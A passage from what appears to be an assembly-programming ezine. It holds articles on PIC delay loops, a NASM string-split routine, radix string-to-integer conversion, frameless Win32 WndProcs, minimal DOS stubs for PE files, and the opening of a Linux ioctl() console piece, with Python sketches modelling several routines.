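    cycles += 2                     # retlw 0
    return cycles


print(delay_cycles())               # cycles for the .100 used in the listing
```

Because count_2 starts at zero, the inner loop always makes 256 passes, so the
only knob that changes the delay is the literal loaded into count_1.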
The size of this piece of code is easy to calculate: each line with a
mnemonic is one instruction word. This makes 115 words from the 512 word
program memory space, so we have nearly 400 instruction words unused.
The PIC's are marvelous chips to bridge the gap between lots and lots of TTL
chips and the overkill of a microcontroller unit with separate RAM, ROM and
I/O. If you want to find out more about this kind of CPU, visit the website at
http://www.microchip.com
for PDF datasheets and more. Scenix also has a range of clones out, right now.
They are software compatible but offer more hardware features. Which is not
difficult, since the codeword in the design of the PIC's seems to have been
KISS.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Splitting Strings
by mammon_
Those familiar with Perl will undoubtedly have used its split() function, which
takes a single string and splits it into multiple strings or into an array,
based on a delimiter character specified in the call. Typical invocations of
split() would be:
($field1, $field2, $junk) = split(':', $line, 3);
@array = split(' ', $line);
In the first line, the source string is split into a maximum of 3 substrings
[the limit passed as the third argument; without it Perl would throw away
everything after the third field], creating a new string each time it
encounters a colon character; note that the third string, $junk, contains the
entire rest of the string -- only the first 2 colons will be parsed.
In the second line, an array of strings is created by
splitting the source string at the space character; since the number of destin-
ation strings is not specified, the array will contain one element for each
substring [read: each string created by splitting the original at a whitespace
character].
Strings and string parsing are notably tedious in assembly. After learning
Perl, I found that the pseudocode for many of my asm programs started to
include a
few calls to 'split', since it is a handy one-line method of string parsing,
applicable to processing command lines, user input, and data files. As a result,
it quickly became necessary to write such a routine.
Since asm has no inherent array or string tokenizing support, there are
many possible approaches to string splitting. Since the most immediate problem
is that the split() routine does not know in advance how many substrings it
will be creating, there is a temptation to code a strtok() replacement, such
that the first call returns the first substring, and subsequent calls each
return the next substring until the end of the string has been reached:
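mov ecx, ptrArray
push dword ptrString
push dword [delimiter]
call split ;first call returns the first substring
mov [ecx], eax
.loop:
call split ;each further call returns the next substring
cmp eax, 0
je .end
add ecx, 4 ;move to the next array element before storing
mov [ecx], eax
jmp .loop
.end: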
This allows for control over the number of substrings created by only calling
split() the desired number of times; however this method also requires a lot
of caller-side work --setting up an array, moving the string pointer returned
in eax to an appropriate array position, and keeping track of the number of
array elements. It is also noticeably more clumsy than the Perl version.
Another method would be to mimic the Perl function entirely, and have split()
return an array of substrings:
push dword ptrString
push dword [delimiter]
call split
mov [ptrStringArray], eax
This is obviously more elegant on the caller side, but it has a few subtle
problems: first, the control over how many elements are split is lost;
secondly, the array is of indefinite element size [i.e., one would have to
scan each string again in order to find the end and thus the next string];
and lastly, the duplication of the string in memory is somewhat of a waste.
The C language has more or less created a string standard in which strings are
terminated with a null ['\0' or 0x0] character. Most library or OS functions
to which the split strings will be passed tend to expect this termination; thus
each substring is going to have a termination byte added. However, this termin-
ation byte can replace the delimiter for each substring, thus allowing the
original string itself to serve as the array of substrings after the split
function. Thus, all that is required from the split function is to return an
array of dword pointers into the original string, and a count of the array
elements [substrings]:
push dword ptrString
push dword [delimiter]
call split
mov [ptrStringArray], eax
mov [StringArrayNum], ebx
The split function will have to create a DWORD element for each substring
it splits; while this is somewhat wasteful, it is still less expensive than
copying the entire string a second time, unless the string is composed of
1-3 byte substrings. In order to control the number of splits, a 'max_split'
parameter will have to be added to the split() routine, such that if max_split
is NULL, the split() routine will return the maximum possible number of
substrings; if max_split is non-NULL, split() will return max_split or fewer
substrings.
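Before turning to the assembly, the idea can be modelled in a few lines of
Python. This is a sketch of the approach described above and not a
translation of the routine below: the buffer is a bytearray that must end in
a zero byte, the returned offsets stand in for the array of dword pointers,
and the function name is made up for the example.

```python
def split_in_place(buf, delimiter, max_split=0):
    """Overwrite delimiters in buf with NULs and return substring offsets.

    buf       -- NUL-terminated bytearray, modified in place
    delimiter -- byte value to split on, e.g. ord(":")
    max_split -- maximum number of substrings, 0 meaning no limit
    """
    offsets = [0]                       # the first substring starts at 0
    pos = 0
    while buf[pos] != 0:                # stop at the terminating NUL
        if buf[pos] == delimiter:
            if max_split and len(offsets) == max_split:
                break                   # limit reached, leave the rest alone
            buf[pos] = 0                # the delimiter becomes a terminator
            offsets.append(pos + 1)     # next substring starts right after it
        pos += 1
    return offsets


line = bytearray(b"this:that:theother:null\0")
print(split_in_place(line, ord(":")), bytes(line))
```

The original string doubles as the storage for all substrings; the only extra
memory needed is one offset (or pointer) per substring.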
The complete split routine is as follows:
#--------------------------------------------------------------------split.asm
; split( char, string, max_split)
; Returns address of array of pointers into original string in eax
; Returns number of array elements in ebx
; Behavior:
; split( ":", "this:that:theother:null\0", NULL)
; "this\0that\0theother\0null\0"
; ptrArray[0] = [ptrArray+0] = "this\0"
; ptrArray[1] = [ptrArray+4] = "that\0"
; ptrArray[2] = [ptrArray+8] = "theother\0"
; ptrArray[3] = [ptrArray+C] = "null\0"
EXTERN malloc
EXTERN free
split:
push ebp
mov ebp, esp ;save stack pointer
mov ecx, [ebp + 8] ;max# of substrings [0 = no limit]
mov edi, [ebp + 12] ;pointer to target string
mov ebx, [ebp + 16] ;splitchar
xor eax, eax ;zero out eax for later
mov edx, esp ;save current stack pos.
push dword edi ;save ptr to first substring
cmp ecx, 0 ;is #splits NULL?
jnz do_split ;--no, start splitting
mov ecx, 0xFFFF ;--yes, set to MAX
do_split:
mov bh, byte [edi] ;get byte from target string
cmp bl, bh ;equal to delimiter?
je .splitstr ;--yes, then split it
cmp al, bh ;end of string? [al == 0x0]
je EOS ;--yes, then leave split()
inc edi ;next char
jmp do_split ;plain characters do not count against the limit
.splitstr:
dec ecx ;one substring fewer may still be created
jz EOS ;--limit reached, leave the rest unsplit
mov [edi], byte al ;replace split delimiter with "\0"
inc edi ;move to first char after delimiter
push edi ;save ptr to next substring
jmp do_split ;continue till limit or EOS
EOS:
mov ecx, edx ;edx, ecx == original stack position
sub ecx, esp ;get total size of pushed pointers
push ecx ;save size
call malloc ;allocate that much space for array
test eax, eax
jz .error
pop ecx ;restore size
mov edi, eax ;set destination to beginning of array
add edi, ecx ;move to end of array
shr ecx, 2 ;divide total size/4 [= # of dwords to move]
mov ebx, ecx ;save count
.store:
sub edi, 4 ;move to beginning of dword
pop dword [edi] ;pop from stack to array
loop .store
.error:
mov esp, ebp
pop ebp
ret ;eax = array[0], ebx = array count
#------------------------------------------------------------------------EOF
The use of the stack in this routine may be a little unclear. Each time a
delimiter is encountered, a pointer to the character after the delimiter
is pushed onto the stack:
this:that:theother\0
^----------------------This is pushed at the very beginning.
                       Element#: array[0]
this:that:theother\0
     ^-----------------This is pushed when the first ':' is found.
                       Element#: array[1]
this\0that:theother\0
           ^-----------This is pushed when the second ':' is found.
                       Element#: array[2]
this\0that\0theother\0
The stack now looks like this:
--------------[ebp]
ptr->string1
ptr->string2
ptr->string3
--------------[esp]
The string pointers are then POPed into the array, starting with array[2]
and ending with array[0].
Once the string is parsed and the pointers are PUSHed to the stack, edi is set
to the address of the array [mov edi, eax] and advanced to the end of the
allocated array [add edi, ecx]. The counter is then set to the number of DWORD
pointers that have been pushed onto the stack [shr ecx, 2]; for each DWORD
pointer, edi is withdrawn 4 bytes more from the end of the array [sub edi, 4]
and the pointer is POPed into that 4 byte space. In the last iteration of the
loop, edi is set to the beginning of the allocated array, and the first DWORD
pointer [ array[0] ] is POPed into the first array element.
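The back-to-front fill is easy to check with a Python list standing in for
the machine stack. The sketch below only models the .store loop; the function
name is invented for the example and the numbers are arbitrary stand-ins for
the pushed pointers.

```python
def unload_stack(stack):
    """Pop every pointer off 'stack' into a new array, last element first."""
    array = [None] * len(stack)     # malloc(size of the pushed pointers)
    index = len(array)              # edi starts just past the end of the array
    while stack:
        index -= 1                  # sub edi, 4
        array[index] = stack.pop()  # pop dword [edi]
    return array


pushed = [0x1000, 0x1005, 0x100A]   # pushed in order of discovery
print(unload_stack(pushed))
```

Since the last pointer pushed is the first one popped, filling the array from
the end is what puts the substrings back into their original order.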
To test this, of course, one needs a program to drive it. The following code
simulates an /etc/passwd read, splitting a hard-coded line into its component,
colon-delimited fields:
#----------------------------------------------------------------splittest.asm
BITS 32
GLOBAL main
EXTERN printf
EXTERN free
EXTERN exit
%include 'split.asm'
SECTION .text
main:
push dword szString ;print the original string
push dword szOutput
call printf
add esp, 8
push dword ":" ;split the original string
push dword szString
push dword 0
call split
add esp, 12
mov [ptrarray], eax ;remember the array address for free()
mov ecx, ebx
mov ebx, eax
printarray: ;print the substrings
push ecx ;printf hoses ecx!!!!!
push dword [ds:ebx]
push dword szOutput
call printf
add esp, 8
add ebx, 4 ;skip to next array element
pop ecx
loop printarray
push dword [ptrarray] ;free the array created by split
call free
add esp, 4
push dword 0 ;program is done
call exit
SECTION .data
szOutput db '%s',0Ah,0Dh,0 ;printf format string
szString db 'name:password:UID:GID:group:home',0 ;string to print
ptrarray dd 0 ;address of the pointer array returned by split
#------------------------------------------------------------------------EOF
This program was written using nasm on a glibc Linux platform; however the
split routine itself is fairly portable --the only assumed external routine
is malloc()-- and can easily be rewritten for the DOS or win32 platforms.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
String to Numeric Conversion
by Laura Fairhead
Here I present you with a library routine that scans a value from
a string and converts it to an integer. It is very useful, not only
when you have to convert string->value but also if you are parsing and
want to recognise a numeric token.
The routine will scan values in any radix from 2 to 36 (the code also
accepts 0 and 1, but then no useful value can be scanned). Characters
for the digit values from 10-35 are naturally "A"-"Z"/"a"-"z".
With this routine there are two entry points, 'scanur' and 'scanu'. 'scanur'
is used to set the radix of the scan conversion. Once this value is
set the main routine 'scanu' can be called freely to scan values from
the string.
The scan routine is called with a string pointer which is updated
on exit to the first invalid character. It will return with the carry
flag set if the value was too big to fit into the return register EAX.
If the carry flag is clear, there is no error, however now the zero flag
indicates if a valid value was actually scanned. This return status
convention gives the most flexibility to the application programmer,
also if a valid value MUST be scanned they can detect the condition
via:-
CALL NEAR PTR scanu
JNA error ;get out if overflow/no value
The branch will be taken if CF=1 or ZF=1. Hence, if a value has to be
scanned errors may be picked up with only one test.
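For readers who want to experiment with the behaviour before assembling
anything, here is a Python model of the routine. It is a sketch that follows
the digit mapping and the overflow rule of the code below; the function
names, the tuple it returns and the use of a bytes object in place of DS:SI
are choices made for this example only.

```python
MAX_EAX = 0xFFFFFFFF


def digit_value(byte):
    """Map a character code to a digit value, or None if it cannot be one."""
    if 0x30 <= byte <= 0x39:                 # "0"-"9"
        return byte - 0x30
    value = ((byte & 0xDF) - 0x37) & 0xFF    # fold case, "A" becomes 10
    if value < 10:                           # only "@" and "`" end up here
        return None
    return value                             # may still be too big for the radix


def scanu(data, radix, pos=0):
    """Scan a number from data[pos:], return (value, new_pos, overflow).

    new_pos indexes the first character that was not consumed; if it equals
    pos, no valid digit was found. When overflow is True the value is not
    meaningful, just as EAX is not in the assembly version.
    """
    total = 0
    while pos < len(data):
        digit = digit_value(data[pos])
        if digit is None or digit >= radix:
            break                            # invalid character ends the scan
        total = total * radix + digit
        if total > MAX_EAX:                  # would not fit into EAX
            return total & MAX_EAX, pos, True
        pos += 1
    return total, pos, False


print(scanu(b"1a3z", 16))
```

The caller can tell the three outcomes apart from the returned tuple alone,
which corresponds to the CF/ZF convention of the real routine.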
=========START OF CODE=====================================================
;
;(current scan radix)
;
scanuradi:
DB ?
;
;scanur- set up for scanu routine
;
;entry: AL=radix
;
; !! radix must be in range 0<=radix<=36
;
; !! radix must be set by calling this routine prior to
; !! using scanu
;
;exit: (all registers preserved)
;
scanur PROC NEAR
MOV BYTE PTR CS:[scanuradi],AL
RET
scanur ENDP
;
;scanu- scan string value returning result
;
;entry: DS:SI=address of string
; DF=0
;
; !! radix must be set previously by calling 'scanur'
;
;exit: SI=updated to offset of first invalid character
;
; CF=1
; a numeric overflow has occurred, ie: the number being scanned
; has become too big to fit into EAX
;
; CF=0
; if ZF=0 then a valid value was scanned, if ZF=1 then no
; valid digits were scanned
;
; EAX=converted value
;
scanu PROC NEAR
;
;preserve registers
;
PUSH EDX
PUSH EBX
PUSH ECX
PUSH DI
;
;initialise
; EBX=radix constant
; EAX=total
; ECX=0, bits 8-31 of ECX always=0 to pad byte digit to dword
; DI=holds original offset
;
XOR EAX,EAX
XOR EBX,EBX
XOR ECX,ECX
MOV DI,SI
MOV BL,BYTE PTR CS:[scanuradi]
;
;main loop start
; EAX,ECX change roles so that we can use AL for the digit calculation
; saving code length
;
lop: XCHG EAX,ECX
LODSB
;
;if "0"-"9" map to 0-9 and skip to radix check
;
SUB AL,030h
CMP AL,0Ah
JC SHORT ko
ADD AL,030h
;
;map "A"-"Z"/"a"-"z" to 10-35, aborting on the one invalid value (040h)
;that won't get trapped in the next stage
;
AND AL,0DFh
SUB AL,037h
CMP AL,0Ah
JC SHORT ko2
;
;digit value checked that it is valid for the current radix
;this also weeds out previous invalid values (since they would be >35)
;jump out of loop is delayed so that EAX can be restored for exit
;
ko: CMP AL,BL
CMC
ko2: XCHG EAX,ECX
JC SHORT erriv
;
;accumulate the digit to the total. the total must be pre-multiplied.
;checks for overflow are done at both points so the routine can never
;generate false results
;
MUL EBX
JC errovr
ADD EAX,ECX
JNC lop
;
;overflow error
; adjust SI index to current char and exit, note
; that CF =1 already
;
errovr: DEC SI
JMP SHORT don
;
;invalid character
; main exit point, SI is adjusted to the current char
; the CMP ensures that CF =0, and also that ZF =1 iff
; no chars have been read
;
erriv: DEC SI
CMP SI,DI
;
;(restore registers and exit)
;
don: POP DI
POP ECX
POP EBX
POP EDX
RET
scanu ENDP
=========END OF CODE=======================================================
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
WndProc, The Dirty Way
by X-Calibre of Diamond
I assume you all know what a WndProc is, and what you need it for. Let me
give you a quick example of a WndProc:
WndProc PROC hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
.IF uMsg == WM_DESTROY
INVOKE PostQuitMessage, NULL
.ELSE
INVOKE DefWindowProc, hWnd, uMsg, wParam, lParam
ret
.ENDIF
xor eax, eax
ret
WndProc ENDP
This generates the following code:
push ebp ; Create stack frame
mov ebp, esp ; Why does MASM use 'leave',
; but not 'enter'?
cmp dword ptr [ebp+0C], WM_DESTROY ; ebp+0C is uMsg
jne @@notDestroy
push NULL
Call PostQuitMessage
jmp @@exitFromDestroy
@@notDestroy:
push [ebp+14] ; ebp+14 is lParam
push [ebp+10] ; ebp+10 is wParam
push [ebp+0C] ; ebp+0C is uMsg
push [ebp+08] ; ebp+08 is hWnd
Call DefWindowProcA ; Let Windows handle the other
; messages
leave ; Remove stack frame
ret 0010 ; Remove function arguments
; from stack and return
@@exitFromDestroy:
xor eax, eax ; Return 'FALSE'
leave ; Remove stack frame
ret 0010 ; Remove function arguments
; from stack and return
Looks nice, and works fine... But it builds a stack frame, even though we are
not using local variables. And if you code in a good fashion, there almost
never will be any... after all, this procedure is just a message handler, and
to keep your code tidy, you will not put all the code in here, but in separate
procedures, which you will call from here.
There's only one reason why MASM builds a stack frame for a function: The
function has a prototype for a hll call. A hll call uses the stack to transfer
its arguments.
So, all we have to do, is remove the prototype. That's easy: Just don't tell
MASM that this function uses any arguments.
This simple tweak will do the trick:
WndProc PROC
...
WndProc ENDP
The arguments will still be passed to the function, since that part of the
code is in the Windows kernel, and has not changed. Be careful though: Since
MASM does not know that there are arguments on the stack, it no longer cleans
up the stack. You have to specify that yourself.
Now we have a slight problem: How can we access the arguments now?
The answer is surprisingly easy: We create aliases for the addresses relative
to the stack pointer (esp). MASM does the same, except that it uses the base
pointer since it created a stack frame, and saved the original stack pointer
in ebp.
Knowing that Windows hll calls always push the arguments in reverse order, and
that the return address is stored on the stack as well, we can devise these
indices for our parameters:
hWnd EQU dword ptr [esp][4]
uMsg EQU dword ptr [esp][8]
wParam EQU dword ptr [esp][12]
lParam EQU dword ptr [esp][16]
There, now we can refer to the arguments as usual.
There's 1 drawback however: Since the indices are relative to esp, they are
only valid when esp is not touched. In other words: Don't try to push or pop
anything and then use these arguments again. They can be used if you push some
variables, then pop them again before you access any of these arguments again,
because the stack pointer will be at the correct position again.
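The offsets above, and the way a push shifts them, can be checked with a few lines of arithmetic. The following is only a sketch in Python rather than assembler; the names arg_offset and stack_cleanup are made up for this illustration and assume 32-bit code with 4-byte arguments.

```python
# Model of where the WndProc arguments live relative to esp.
# Assumption: 32-bit code, every argument is one dword, and the
# return address sits at [esp] on entry.
DWORD = 4
RETURN_ADDRESS_SIZE = 4
ARG_NAMES = ["hWnd", "uMsg", "wParam", "lParam"]


def arg_offset(index, bytes_pushed=0):
    """Offset from esp of argument number `index` (0-based).

    bytes_pushed is how much the function itself has pushed since entry.
    """
    return bytes_pushed + RETURN_ADDRESS_SIZE + index * DWORD


def stack_cleanup(arg_count):
    """Operand for 'ret n' when the callee removes its own arguments."""
    return arg_count * DWORD


# Offsets on entry match the EQU lines: 4, 8, 12, 16.
on_entry = {name: arg_offset(i) for i, name in enumerate(ARG_NAMES)}

# After a single 'push', every alias is off by 4 bytes.
after_push = {name: arg_offset(i, bytes_pushed=4)
              for i, name in enumerate(ARG_NAMES)}

print(on_entry)
print(after_push)
print(stack_cleanup(len(ARG_NAMES)))
```

The second dictionary shows why the aliases go stale: after one push, [esp][8] no longer holds uMsg but hWnd.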
Let's say you need to use the stack again (eg. for an INVOKE), so the indices
will be invalidated. You might think that the only option then is to save the
stack pointer again, so we're back to the stack frame...
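It's an option, but not the best one. Namely, ebp is a non-volatile register,
and needs to be saved and restored after use.
But there are more registers in the CPU. How about using esi, for example?
(Strictly speaking, the Win32 calling convention lists ebx, esi and edi as
non-volatile too, next to ebp; only eax, ecx and edx are free for the taking.
If you want to play it safe, save esi before you use it and restore it before
you return.)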
WndProc PROC
mov esi, esp
hWnd EQU dword ptr [esi][4]
uMsg EQU dword ptr [esi][8]
wParam EQU dword ptr [esi][12]
lParam EQU dword ptr [esi][16]
...
WndProc ENDP
And if you leave the stack as you found it (which should always be the case
with decent code), you don't even need to restore esp again.
If you got dirty and the stack still contains variables you don't want
anymore, then this is enough for a clean exit:
WndProc PROC
...
mov esp, esi
ret 4 * sizeof dword ; As I mentioned earlier, we have to clean
; the stack ourselves.
; We had 4 dword arguments, so this does
; the trick
WndProc ENDP
Still less code, and thus faster than the original. And just as robust. You
have one register less to use during the WndProc, but as I said earlier, there
shouldn't be too much code here, so you should be able to spare the register.
Well, there's just 1 more thing that can be done with this tweaked WndProc.
Namely, if you leave the stack as you found it, the arguments for the
DefWindowProc are already in place, and the return address of our caller is
there too.
So basically we can just jump to it without any further ado. The resulting
WndProc that is equivalent to the original one will look like this then:
WndProc PROC
hWnd EQU dword ptr [esp][4]
uMsg EQU dword ptr [esp][8]
wParam EQU dword ptr [esp][12]
lParam EQU dword ptr [esp][16]
.IF uMsg == WM_DESTROY
INVOKE PostQuitMessage, NULL
.ELSE
jmp DefWindowProc
.ENDIF
xor eax, eax
ret 4 * sizeof dword ; Be sure to clean that stack!
WndProc ENDP
Yes, much shorter, and faster. Let's take a look at the generated code to get
a better understanding of how much shorter it actually is:
cmp dword ptr [esp+08], WM_DESTROY
jne @@noDestroy
push NULL
Call PostQuitMessage
jmp @@exitFromDestroy
@@noDestroy:
Jmp DefWindowProcA
@@exitFromDestroy:
xor eax, eax
ret 0010
If you code it 'by hand' instead of with the .IF statement, there's another
tweak we can pull, but the rest looks great, doesn't it?
Of course these stunts can be applied to other procedures as well. Be careful,
and use them in good health.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
Programming the DOS Stub
by X-Calibre of Diamond
As you may (or may not) know, there is a piece of DOS code still in every
Win32 executable file. This piece of code is referred to as the 'stub' and
ensures that the Win32 program won't cause a crash when run on a DOS system.
It just prints the familiar 'This program cannot be run in DOS mode' message
and exits.
'So what do we care?' you might ask... Well, Microsoft's linker provides the
option to link your own stub instead of the standard one. And, you must have
guessed it already by now: We can do it better than Microsoft!
So, how do we do this then?
Well, actually it's very simple: The first part of the Win32 executable is
literally a DOS file. There's just one small requirement: at offset 3Ch (60)
there is a DWORD specifying the start of the PE block relative to the start of
the file (the offset).
So basically you can just put any DOS EXE program in there, as long as you
make sure that there is room for the DWORD at offset 3Ch in the file. Usually
this is no problem, since the EXE header itself is usually quite big, and a
lot of the space is not being used. Microsoft's own stub has an empty header
mostly, and the code starts right after the DWORD, at offset 40h.
That's all fine and nice and whatever, but what can we do with this info?
Well, you could link in an entire DOS program for people not using Windows
(Look at REGEDIT.EXE in Windows 9x for an example). You could include a Fire
or Plasma effect when your program is run in DOS. You could create your own
'This program cannot be run in DOS mode' message. But, most importantly:
you can create smaller EXE files! That is one of the nicer applications of
this stub, and the one I'm going to explain a bit here.
What is the smallest size for the stub, theoretically speaking?
Well, considering the fact that at offset 60 there MUST be an offset pointing
to the PE header, the minimum size will be 60 bytes.
The actual stub file has to be 64 bytes, because of restrictions of Microsoft's
linker. But be sure not to use the last 4 bytes, since the linker will put in
the offset there.
Well, so in 60 bytes, you can't really do much. But just printing a small
warning for DOS users and then exiting is just about possible. Microsoft made
their version a little large: 120 bytes. So we can try to do just about the
same in 60 bytes.
We're going to use a little trick here, to get the program as small as 60
bytes. At offset 20h, there is room for a relocation table for the code. But
since we won't be needing any relocations, we're going to put our code in
there. This is perfectly possible, because you can specify how many relocation
table items your program will be using. We just put in a 0 word at offset 6 in
the header, and the table is ours. Technically speaking, the code is still
after the table. The table just has a length of 0 bytes.
For all you non-DOS coders out there, this is what the program looks like:
;====================================================================stub.asm
.Model Tiny
.code
start:
push cs ; Point the data segment to the code segment, since
pop ds ; we're putting the data after the code to save space.
mov dx, offset message ; Load pointer to the string for the call.
mov ah, 9 ; 9 is the print argument for int 21h.
int 21h ; The DOS interrupt.
mov ah, 4Ch ; 4C is the exit argument for int 21h
int 21h
; Put our string here
message db "Windows prg!",0Dh,0Ah,'$'
; A little explanation may be required:
;
; 0Dh is the 'Carriage return' ASCII code.
; 0Ah is the 'Line feed' ASCII code.
; '$' is the string-terminator in DOS (like 0 is in Windows and other C based
; OSes)
end start
;=========================================================================EOF
The message can be 15 bytes at most, including the string terminator, since
the program itself starts at offset 32 in the file, and is 13 bytes long.
(32+13+15 = 60, so the message ends at offset 59 and the next byte is the
first one of the PE offset DWORD).
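For those who would rather not hand-edit the linker output, the 64-byte file can also be put together byte by byte. The following Python sketch is not the STUB.EXE that accompanies this article; it is a reconstruction under assumptions. The opcode bytes were counted by hand from the listing above (13 bytes of code), and the values chosen for the minimum/maximum allocation and the initial SP (0010h, FFFFh and 00B8h) are guesses that merely give the program a small stack.

```python
import struct

# Machine code of the listing above, assembled by hand.
CODE = bytes([
    0x0E,              # push cs
    0x1F,              # pop ds
    0xBA, 0x0D, 0x00,  # mov dx, 000Dh  (message follows the 13 code bytes)
    0xB4, 0x09,        # mov ah, 9
    0xCD, 0x21,        # int 21h
    0xB4, 0x4C,        # mov ah, 4Ch
    0xCD, 0x21,        # int 21h
])
MESSAGE = b"Windows prg!\r\n$"

CODE_START = 0x20      # code sits where the relocation table would be
PE_OFFSET_FIELD = 0x3C  # DWORD the linker fills in


def build_stub(code=CODE, message=MESSAGE):
    """Return a 64-byte DOS stub image (header + code + message)."""
    body = code + message
    if len(body) > PE_OFFSET_FIELD - CODE_START:
        raise ValueError("code + message must fit in 28 bytes")
    # The 'mov dx' operand must point just past the code.
    if struct.unpack_from("<H", code, 3)[0] != len(code):
        raise ValueError("message offset in 'mov dx' is wrong")
    header = struct.pack(
        "<2s13H",
        b"MZ",
        64,      # 02h: bytes used in the last 512-byte page
        1,       # 04h: file size in 512-byte pages
        0,       # 06h: number of relocation items
        2,       # 08h: header size in 16-byte paragraphs (32 bytes)
        0x0010,  # 0Ah: minimum extra paragraphs (assumption)
        0xFFFF,  # 0Ch: maximum extra paragraphs (assumption)
        0,       # 0Eh: initial SS
        0x00B8,  # 10h: initial SP (assumption)
        0,       # 12h: checksum, unused
        0,       # 14h: initial IP
        0,       # 16h: initial CS
        0x20,    # 18h: offset of the (empty) relocation table
        0,       # 1Ah: overlay number
    )
    image = header.ljust(CODE_START, b"\0") + body
    image = image.ljust(PE_OFFSET_FIELD, b"\0")
    return image + b"\0" * 4  # left empty for the linker


stub = build_stub()
print(len(stub), stub.hex())
```

Writing the result to disk with open("STUB.EXE", "wb").write(stub) would give a file to pass to the linker; whether a given linker version accepts it is not something this sketch can promise.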
This version yields an undefined error code on exit. The error code is
specified in al when you call the exit DOS function, so here it depends on
whatever the int 21h call that prints the string leaves in al. This is of
course undefined (actually it is 24h in Windows 98).
Microsoft's stub has a defined error code of 1. If you want to make your stub
100% the same, then you must replace the 'mov ah, 4Ch' with 'mov ax, 4C01h'.
Mind you that this code is 1 byte longer, so your message can then be only 14
bytes long in total.
Since I'm never going to use the errorcode, I decided to save the byte and use
a larger string.
And that's that. Now you may run into trouble with the linker. I couldn't find
a linker that kept the EXE header to its minimum (which is 32 bytes). I used
TLINK, which made a 512 byte header. So I just edited the file manually, and
got it to its minimum size. A document explaining the EXE header format is
enclosed, and so is the STUB.EXE I made, and a small Win32 application using
it (with relocated PE header at 40h).
I will just briefly describe how the filesize is stored in the header, since
the document is not particularly clear there.
offset  length  description                        comments
----------------------------------------------------------------------
2       word    length of last used sector in file modulo 512
4       word    size of file, incl. header         in 512-pages
The '512-pages' at offset 4 are (floppy) disk sectors. They are 512 bytes
each. So to calculate how many sectors your file will occupy, this formula
will suffice:
sectors = CEILING(filesize/512)
CEILING means rounding up to the next whole number.
The length of the last used sector at offset 2 stores how many bytes are
occupied in the last sector of the file. Like the comment says, it's filesize
modulo 512.
In other words:
lastusedsector = filesize - 512*FLOOR(filesize/512)
The other way around is of course like this (when the file is an exact
multiple of 512 bytes, lastusedsector is 0 and the size is simply sectors*512):
filesize = (sectors - 1)*512 + lastusedsector
A little note here: Look at these 2 values in a program with the standard
Microsoft stub (eg. NOTEPAD.EXE).
We find these 2 values:
offset 2: 0090h
offset 4: 0003h
So the filesize is: (3 - 1)*512 + 144 = 1168
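The same arithmetic, written out as a small Python sketch for anyone who wants to check a header by machine. The function names are invented for this example; the case of a last-sector value of 0 (a file that is an exact multiple of 512 bytes) is handled separately.

```python
PAGE = 512  # size of one '512-page' (disk sector) in bytes


def exe_size_fields(filesize):
    """Return (lastusedsector, sectors) as stored at offsets 2 and 4."""
    sectors = (filesize + PAGE - 1) // PAGE   # CEILING(filesize/512)
    lastusedsector = filesize % PAGE          # filesize modulo 512
    return lastusedsector, sectors


def exe_filesize(lastusedsector, sectors):
    """Reconstruct the file size from the two header words."""
    if lastusedsector == 0:
        # The last sector is completely full.
        return sectors * PAGE
    return (sectors - 1) * PAGE + lastusedsector


# The values found in the standard Microsoft stub:
print(exe_filesize(0x0090, 0x0003))
# What a 64-byte stub should carry instead:
print(exe_size_fields(64))
```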
Now wait just a second! At offset 3Ch we find 00000080h...
So at offset 128 we find the PE header and the Windows program. Then how can
the DOS stub be 1168 bytes?
It can't!! Microsoft goofed up here... They have probably hand-edited the
EXE file they used for the stub like I did, and forgot to edit these values.
Luckily for them, this bug does no harm. But still...
Well, after we have created our DOS stub, all we have to do is link it in.
With Microsoft's linker it goes like this:
LINK code.obj /SUBSYSTEM:WINDOWS /STUB:STUB.EXE
And that's all you need!
You can ignore the warning the linker gives about the incomplete header. We
know that the program runs. The linker just doesn't expect EXE headers with
no relocation table. This could actually be considered a bug: our EXE header
specifies that the table has length 0, and therefore the code can start at
offset 20h. The DOS EXE loader does interpret it correctly, so in fact the
linker could be considered incompatible.
The only problem with Microsoft's linker is that it doesn't seem to want to
link the PE block right after the DOS stub. Maybe other linkers do, but I
haven't found one that does yet. Microsoft's linker just dumps some garbage,
and then puts its PE block at offset 78h. Maybe that is because their stub is
78h bytes long and they don't consider shorter stubs?
The offset at which the PE block is linked depends on the initial SP value
specified at offset 10h, actually (why is that?). It can also link at offset
80h or 88h.
You could move the PE block to offset 40h, and pad with 0's after the PE block,
using a hex-editor. This way it will compress even better, maybe. And you
could perhaps edit the PE block and move the code forward a bit too (there's a
great util in this. Shall we make it?).
Well, anyway... Have fun, and get crazy with your custom DOS stubs!
And remember:
DOS Knowledge is power!
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
Using ioctl()
by mammon_
One of the most famous Unix maxims reads 'everything is a file'; directories
are files, pipes are files, hardware devices are files, even files are files.
This provides a transparent means of reading and writing hardware or software
constructs such as modems and sockets; yet the lack of interrupts or device
driver routines is sometimes confusing for those not used to Unix programming.
In Linux, device parameters are controlled through the character and block
'special file' interface by means of ioctl().
The ioctl() system call takes a file descriptor and a request type as its
primary arguments, along with an optional third argument referred to as "argp"
which contains any arguments that must be passed along with the request. The
possible ioctl() requests can be found by poking around in the $INCLUDE/asm and
$INCLUDE/linux header files, although a somewhat dated list of requests can be
viewed by typing 'man ioctl_list'.
One of the most useful devices to program with ioctl() for the applications
programmer will be the console; in linux terms, this consists of the keyboard
and display, such that all 63 of the Virtual Consoles can be controlled with
ioctl(). This can be useful if one wants to output debugging information to a
non-visible console, or to transfer STDIN and STDOUT to a newly-allocated
console while disabling virtual console switching, effectively tying the user
to a single console [e.g., in a walkup workstation].
Information on console ioctl requests can be found with 'man console_ioctl'.
Bringing up this man page instantly displays the following text:
WARNING: If you use the following information you are
going to burn yourself.
WARNING: ioctl's are undocumented Linux internals, liable
